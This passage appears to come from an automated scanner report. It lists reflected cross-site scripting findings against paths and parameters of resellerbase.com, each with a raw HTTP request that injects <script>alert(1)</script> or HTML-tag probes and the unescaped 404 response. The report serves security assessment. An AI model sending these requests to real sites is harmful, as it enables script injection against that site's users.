<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php?keyword=search...&Submit3=Search8846d<a>6959bebb13d&opt=2 was not found on this server.</p>
...[SNIP]...

2.1845. http://www.resellerbase.com/detail/23/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8f74b<a>0bc28b2fe12 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/search.php?keyword=search...8f74b<a>0bc28b2fe12&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php?keyword=search...8f74b<a>0bc28b2fe12&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1846. http://www.resellerbase.com/detail/23/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3f42e<script>alert(1)</script>c1db037ab36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/search.php?keyword=search...&Submit3=Search&opt=2&3f42e<script>alert(1)</script>c1db037ab36=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php?keyword=search...&Submit3=Search&opt=2&3f42e<script>alert(1)</script>c1db037ab36=1 was not found on this server.</p>
...[SNIP]...

2.1847. http://www.resellerbase.com/detail/23/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 38791<a>e2ec0b1dd96 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/search.php?keyword=search...&Submit3=Search&opt=238791<a>e2ec0b1dd96 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php?keyword=search...&Submit3=Search&opt=238791<a>e2ec0b1dd96 was not found on this server.</p>
...[SNIP]...

2.1848. http://www.resellerbase.com/detail/23/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0676<script>alert(1)</script>1336f838662 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild0676<script>alert(1)</script>1336f838662/23/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild0676<script>alert(1)</script>1336f838662/23/themes/ was not found on this server.</p>
...[SNIP]...

2.1849. http://www.resellerbase.com/detail/23/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2527e<script>alert(1)</script>3fe344ba4c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/232527e<script>alert(1)</script>3fe344ba4c7/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/232527e<script>alert(1)</script>3fe344ba4c7/themes/ was not found on this server.</p>
...[SNIP]...

2.1850. http://www.resellerbase.com/detail/23/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b00b<script>alert(1)</script>8d91692fede was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes8b00b<script>alert(1)</script>8d91692fede/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes8b00b<script>alert(1)</script>8d91692fede/ was not found on this server.</p>
...[SNIP]...

2.1851. http://www.resellerbase.com/detail/23/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bc414<script>alert(1)</script>33c3ae3a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/?bc414<script>alert(1)</script>33c3ae3a1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/?bc414<script>alert(1)</script>33c3ae3a1=1 was not found on this server.</p>
...[SNIP]...

2.1852. http://www.resellerbase.com/detail/23/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa5e0<script>alert(1)</script>a1c962b7b73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa5e0<script>alert(1)</script>a1c962b7b73/23/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa5e0<script>alert(1)</script>a1c962b7b73/23/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1853. http://www.resellerbase.com/detail/23/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a300d<script>alert(1)</script>6b41e1d7814 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23a300d<script>alert(1)</script>6b41e1d7814/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23a300d<script>alert(1)</script>6b41e1d7814/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1854. http://www.resellerbase.com/detail/23/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d8dd<script>alert(1)</script>28fe1a52c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes3d8dd<script>alert(1)</script>28fe1a52c8/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes3d8dd<script>alert(1)</script>28fe1a52c8/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1855. http://www.resellerbase.com/detail/23/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 825d6<script>alert(1)</script>560341326b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos825d6<script>alert(1)</script>560341326b5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos825d6<script>alert(1)</script>560341326b5/ was not found on this server.</p>
...[SNIP]...

2.1856. http://www.resellerbase.com/detail/23/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6988a<script>alert(1)</script>91ed9e8f740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/?6988a<script>alert(1)</script>91ed9e8f740=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/?6988a<script>alert(1)</script>91ed9e8f740=1 was not found on this server.</p>
...[SNIP]...

2.1857. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41bb0<script>alert(1)</script>cbff780738a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail41bb0<script>alert(1)</script>cbff780738a/23/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail41bb0<script>alert(1)</script>cbff780738a/23/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1858. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36531<script>alert(1)</script>0f11fbd120e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2336531<script>alert(1)</script>0f11fbd120e/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2336531<script>alert(1)</script>0f11fbd120e/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1859. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a654<script>alert(1)</script>1c3ca2721c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes5a654<script>alert(1)</script>1c3ca2721c1/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes5a654<script>alert(1)</script>1c3ca2721c1/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1860. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed65b<script>alert(1)</script>49842d2ca97 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmosed65b<script>alert(1)</script>49842d2ca97/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmosed65b<script>alert(1)</script>49842d2ca97/images/ was not found on this server.</p>
...[SNIP]...

2.1861. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4c7aa<script>alert(1)</script>fedf6121cc6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images4c7aa<script>alert(1)</script>fedf6121cc6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images4c7aa<script>alert(1)</script>fedf6121cc6/ was not found on this server.</p>
...[SNIP]...

2.1862. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c82aa<script>alert(1)</script>bc6fc0f7874 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/?c82aa<script>alert(1)</script>bc6fc0f7874=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/?c82aa<script>alert(1)</script>bc6fc0f7874=1 was not found on this server.</p>
...[SNIP]...

2.1863. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3118<script>alert(1)</script>a49ff0fedf9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb3118<script>alert(1)</script>a49ff0fedf9/23/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb3118<script>alert(1)</script>a49ff0fedf9/23/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1864. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46843<script>alert(1)</script>e4d3052b05b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2346843<script>alert(1)</script>e4d3052b05b/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
